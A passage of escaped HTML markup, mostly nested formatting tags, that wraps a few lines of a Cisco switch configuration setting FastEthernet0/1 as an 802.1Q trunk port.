rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;interface FastEthernet0/1&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;  switchport mode trunk&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;!&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- If 802.1Q is configured,&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- you will instead see the following output&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- under interface FastEthernet0/1:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- interface FastEthernet0/1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- switchport trunk encapsulation dot1q&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- switchport mode 